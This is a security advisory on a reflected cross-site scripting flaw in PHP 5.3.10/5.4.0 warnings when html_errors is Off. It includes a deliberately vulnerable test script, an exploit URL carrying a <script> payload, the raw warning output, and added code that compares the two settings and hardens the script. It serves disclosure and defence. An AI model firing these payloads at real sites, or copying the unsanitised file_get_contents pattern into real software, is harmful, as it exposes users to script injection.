PHP 5.3.10 / 5.4.0 Cross Site Scripting

2012-04-09T00:00:00
ID PACKETSTORM:111695
Type packetstorm
Reporter Akastep
Modified 2012-04-09T00:00:00

Description

                                        
=============================================================================================  
Vulnerable Software: PHP 5.3.10/5.4.0  
  
php-5.3.10-Win32-VC9-x86.zip (MD5 SUM: af452dfa681ae03ff42eea6d1c7348cd )  
php-5.4.0-Win32-VC9-x86.zip (MD5 SUM: b1b0abe883f84eb6d76793aabf1aa612 )  
Downloaded From:windows.php.net  
=============================================================================================  
Tested:  
OS:Windows NT SRV2003-A1W2LOM 5.2 build 3790 (Windows Server 2003 Enterprise Edition) i586  
Apache from apachelounge.com: Version: 2.2.22.0  
=============================INFO============================================================  
PHP 5.3.10  
OS:Windows NT SRV2003-A1W2LOM 5.2 build 3790 (Windows Server 2003 Enterprise Edition) i586  
PHP Version 5.3.10  
Build Date Feb 2 2012 20:26:31  
Compiler MSVC9 (Visual C++ 2008)  
Architecture x86  
Configure Command cscript /nologo configure.js  
"--enable-snapshot-build" "--disable-isapi" "--enable-debug-pack" "--disable-isapi" "--without-mssql"  
"--without-pdo-mssql" "--without-pi3web" "--with-pdo-oci=C:\php-sdk\oracle\instantclient10\sdk,shared"  
"--with-oci8=C:\php-sdk\oracle\instantclient10\sdk,shared" "--with-oci8-11g=C:\php-sdk\oracle\instantclient11\sdk,shared"  
"--enable-object-out-dir=../obj/" "--enable-com-dotnet" "--with-mcrypt=static" "--disable-static-analyze"  
==============================================================================================  
PHP 5.4.0  
OS:Windows NT SRV2003-A1W2LOM 5.2 build 3790 (Windows Server 2003 Enterprise Edition) i586  
Build Date Feb 29 2012 19:20:16  
Compiler MSVC9 (Visual C++ 2008)  
Architecture x86  
Configure Command cscript /nologo configure.js "--enable-snapshot-build"  
"--disable-isapi" "--enable-debug-pack" "--disable-nsapi" "--without-mssql"  
"--without-pdo-mssql" "--without-pi3web" "--with-pdo-oci=C:\php-sdk\oracle\instantclient10\sdk,shared"  
"--with-oci8=C:\php-sdk\oracle\instantclient10\sdk,shared" "--with-oci8-11g=C:\php-sdk\oracle\instantclient11\sdk,shared"  
"--enable-object-out-dir=../obj/" "--enable-com-dotnet" "--with-mcrypt=static" "--disable-static-analyze" "--with-pgo"  
===============================================================================================  
  
  
Vuln Desc: Cross Site Scripting Vulnerability (reflected).  
Reason: the comment on the => html_errors <= directive in php.ini-* recommends Off "for security", but Off is the mode in which PHP writes warnings as raw text.  
In that mode PHP does not sanitize the client-controlled argument when it generates the warning, so the argument is reflected unescaped.  
The problem is what PHP 5.3.10's php.ini "says":  
//Snippet from php.ini-production (this also applies to php.ini-development, except for display_errors)  
---------SNIP STUFF ------------------------  
display_errors = off  
----- SOME CONFIGURATION SNIP------------  
; When PHP displays or logs an error, it has the capability of inserting html  
; links to documentation related to that error. This directive controls whether  
; those HTML links appear in error messages or not. For performance and security  
; reasons, it's recommended you disable this on production servers.  
; Note: This directive is hardcoded to Off for the CLI SAPI  
; Default Value: On  
; Development Value: On  
; Production value: Off  
; http://php.net/html-errors  
html_errors = off  
------------EOF SNIP STUFF------------------------  
  
I agree that display_errors = Off works as expected, but...  
Simply switch display_errors from Off to On (display_errors = On),  
restart Apache,  
and exploit it:  
(say this is the vulnerable script on the server, e.g.:)  
  
cat step2.php  
/* BEGIN */  
<?php  
// Deliberately vulnerable test script: the ?test= value goes straight to file_get_contents().  
if(isset($_GET['test']))  
{  
    // With display_errors = On, the warning raised here echoes $_GET['test'] back to the client.  
    file_get_contents($_GET['test']);  
  
}  
  
  
?>  
/* = EOF */  
  
Exploit:  
http://192.168.0.15/bypass/work/step2.php?test=../../../../../../../../../../../../../../<script>alert(document.location);</script>  
  
From the page source (note that PHP does not HTML-encode it: a non-persistent, i.e. reflected, Cross Site Scripting vulnerability):  
  
Warning: file_get_contents(): Unable to access ../../../../../../../../../../../../../../<script>alert(document.location);</script> in C:\Program Files\Apache2.2\Apache2\htdocs\bypass\work\step2.php on line 6  
  
Warning: file_get_contents(../../../../../../../../../../../../../../<script>alert(document.location);</script>): failed to open stream: No such file or directory in C:\Program Files\Apache2.2\Apache2\htdocs\bypass\work\step2.php on line 6  
  
Print screen:  
http://s019.radikal.ru/i634/1204/d8/ec8485e212bc.png  
  
  
The whole problem is that html_errors = Off does not do what its php.ini comment leads you to expect.  
In the Off state PHP formats the warning as plain text and applies no HTML escaping at all, so the <script> tag above is sent verbatim inside a text/html response; only in the On state does PHP entity-encode the function arguments (and then wraps them in its own <b>/<a> markup).  
  
(Note: PHP 5.4.0's php.ini-production ships html_errors = On, and in that state the output is escaped and the issue does not trigger. PHP 5.4.0 is affected all the same: change the directive to Off for testing and it behaves exactly like 5.3.10.)  
  
In other words, the setting recommended as the "secure" one is the one that reflects raw input, and vice versa.  
You can confirm it simply:  
change it to On, restart Apache and try the request above (it will not work in this state).  
Here is the output after changing to => html_errors = On <=:  
  
From the page source (note that it is now HTML-encoded and safe):  
<br />  
<b>Warning</b>: file_get_contents(../../../../../../../../../../../../../../<script>alert(1);</script>) [<a href='function.file-get-contents'>function.file-get-contents</a>]: failed to open stream: Invalid argument in <b>C:\Program Files\Apache2.2\Apache2\htdocs\bypass\work\step2.php</b> on line <b>6</b><br />  
  
  
In fact, on production servers display_errors = Off is the default, and that suppresses all of this output (it mitigates the issue).  
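To see the two formats side by side without Apache in the loop, here is an added example (my own code, not from the original advisory) that captures the warning text PHP produces for one tainted argument under html_errors = Off and under html_errors = On, and reports which one reflects the raw tag. The $tainted value is constructed to mirror the advisory's ?test= payload. Both directives are PHP_INI_ALL, so ini_set() overrides php.ini for this request only; that also covers the CLI SAPI, which merely defaults html_errors to Off.

```php
<?php
// Added example, not code from the original advisory: capture PHP's own
// warning text for one tainted argument under both html_errors settings and
// report which one reflects the raw <script> tag. Both directives are
// PHP_INI_ALL, so ini_set() overrides php.ini for this request only.

// Constructed input, the same shape as the advisory's ?test= payload.
$tainted = str_repeat('../', 14) . '<script>alert(document.location);</script>';

/**
 * Trigger the file_get_contents() warning with $tainted as the argument and
 * return exactly what PHP would have sent to the client.
 */
function capture_warning($tainted, $html_errors)
{
    error_reporting(E_ALL);
    ini_set('display_errors', '1');                 // the advisory's precondition
    ini_set('html_errors', $html_errors ? '1' : '0');

    ob_start();
    file_get_contents($tainted);                    // warning: failed to open stream
    return ob_get_clean();
}

/** Compare the two output formats; returns two named booleans. */
function compare_error_formats($tainted)
{
    $plain = capture_warning($tainted, false);      // html_errors = Off
    $html  = capture_warning($tainted, true);       // html_errors = On
    return array(
        // Off: the message is plain text and the tag is reflected verbatim.
        'off_reflects_raw_tag' => strpos($plain, '<script>') !== false,
        // On: PHP entity-encodes the function arguments before adding its own
        // <b>/<a> markup, so the client sees &lt;script&gt; and no raw tag.
        'on_escapes_tag'       => strpos($html, '&lt;script&gt;') !== false
                                  && strpos($html, '<script>') === false,
    );
}

header('Content-Type: text/plain; charset=UTF-8');
foreach (compare_error_formats($tainted) as $check => $ok) {
    printf("%-22s %s\n", $check, $ok ? 'yes' : 'no');
}
```

Run it as `php -f compare.php` or drop it under the Apache document root; on an affected setup both checks print "yes", which is the whole finding in two lines: the Off mode reflects, the On mode escapes. If the Off check prints "no", display_errors is being overridden somewhere else (for example by an Apache php_admin_value), which is worth knowing before you trust the php.ini alone.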
  
Here are my MD5 sums:  
  
me@localhost.localdomain /cygdrive/c/temp/mydirsnap  
$ md5sum php-5.3.10-Win32-VC9-x86.zip  
af452dfa681ae03ff42eea6d1c7348cd *php-5.3.10-Win32-VC9-x86.zip <= the copy from my VirtualBox (same MD5 sum)  
  
me@localhost.localdomain /cygdrive/c/temp/mydirsnap  
$ md5sum 2/php-5.3.10-Win32-VC9-x86.zip  
af452dfa681ae03ff42eea6d1c7348cd *2/php-5.3.10-Win32-VC9-x86.zip <= just downloaded from windows.php.net (same MD5 sum, see the listing below)  
  
me@localhost.localdomain /cygdrive/c/temp/mydirsnap  
$ ls -liaR  
.:  
total 15436  
44754521297054585 drwxrwxrwt+ 1 Гость Отсутствует 0 Apr 8 22:57 .  
3659174697249195 drwxrwxrwt+ 1 Domain Отсутствует 0 Apr 8 22:57 ..  
5629499534273522 drwxrwxrwt+ 1 Гость Отсутствует 0 Apr 8 23:01 2  
3659174697298844 -rwxrwxrwx+ 1 Гость Отсутствует 15805513 Feb 13 00:37 php-5.3.10-Win32-VC9-x86.zip <= the copy from my VirtualBox  
  
./2:  
total 15436  
5629499534273522 drwxrwxrwt+ 1 Гость Отсутствует 0 Apr 8 23:01 .  
44754521297054585 drwxrwxrwt+ 1 Гость Отсутствует 0 Apr 8 22:57 ..  
26177172834151436 -rwxrwxrwx+ 1 user Отсутствует 15805513 Apr 8 22:12 php-5.3.10-Win32-VC9-x86.zip <= just downloaded from windows.php.net  
  
me@localhost.localdomain /cygdrive/c/temp/mydirsnap  
  
  
Note: not tested under Linux; tested *only* under Windows Server 2003.  
  
  
  
  
********************************************** Workaround *******************************************  
After experimenting with html_errors = On/Off, test your server as shown above.  
Turn display_errors off in your php.ini (suppress all errors and warnings, so nothing is output  
to the client side). Note that html_errors = On escapes the reflected argument, but only display_errors = Off removes the output entirely.  
****************************************************************************************************  
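The php.ini change above is the real fix, but the script that passes a raw query parameter to file_get_contents() is what hands PHP the tainted string in the first place. As an added example (my own code, not the advisory's), here is a hardened version of step2.php with two independent layers: runtime error handling that never lets PHP's warning text reach the client, and path validation against an allowlisted directory. DOCUMENT_BASE, safe_read_file() and the 'public' subdirectory are this example's own assumptions.

```php
<?php
// Added example, not code from the original advisory: a hardened step2.php.
// Layer 1 keeps PHP's own warning text away from the client even if php.ini
// is wrong; layer 2 stops the tainted ?test= value from reaching
// file_get_contents() at all. DOCUMENT_BASE and safe_read_file() are assumed
// names for this example.

// Layer 1: belt and braces over the php.ini setting the advisory recommends.
// Runtime ini_set() cannot cover errors raised before this line runs, which is
// why php.ini remains the authoritative place for display_errors = Off.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// Any warning that still fires is written to the server log, tainted argument
// included, and nothing is printed. Returning true skips PHP's own handler.
set_error_handler(function ($errno, $errstr, $errfile, $errline) {
    error_log(sprintf('[%d] %s in %s:%d', $errno, $errstr, $errfile, $errline));
    return true;
});

// Layer 2: only serve files from one allowlisted directory (assumed path).
define('DOCUMENT_BASE', __DIR__ . DIRECTORY_SEPARATOR . 'public');

/**
 * Return the file's contents, or null if $name is not a plain file name that
 * resolves to a regular file inside DOCUMENT_BASE.
 */
function safe_read_file($name)
{
    // Plain file names only: no separators, no "..", no markup characters.
    if (!is_string($name) || !preg_match('/^[A-Za-z0-9_.-]+$/', $name)
        || strpos($name, '..') !== false) {
        return null;
    }
    $base = realpath(DOCUMENT_BASE);
    $path = realpath(DOCUMENT_BASE . DIRECTORY_SEPARATOR . $name);
    // realpath() is false for a missing file; the prefix check also defeats
    // symlinks pointing out of the base directory.
    if ($base === false || $path === false || !is_file($path)
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return file_get_contents($path);
}

if (isset($_GET['test'])) {
    $body = safe_read_file($_GET['test']);
    header('Content-Type: text/plain; charset=UTF-8');
    if ($body === null) {
        header('HTTP/1.1 400 Bad Request');
        // The response is not HTML, but escaping keeps the echo safe even if
        // someone later changes the content type.
        $shown = is_string($_GET['test']) ? $_GET['test'] : '(array)';
        echo 'Rejected: ', htmlspecialchars($shown, ENT_QUOTES, 'UTF-8');
    } else {
        echo $body;
    }
}
```

With this in place, the advisory's request gets a 400 and a plain-text, entity-encoded echo instead of a warning carrying the raw <script> tag, and the attempted path lands in the error log rather than in the response. Keep display_errors = Off in php.ini regardless: the ini_set() calls here protect this one script, not the rest of the document root.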
  
  
/AkaStep ^_^  
Greetz to all:  
packetstormsecurity.*,securityfocus.com,cxsecurity.com,security.nnov.ru,securtiyvulns.com and to all others!  
Thank you.  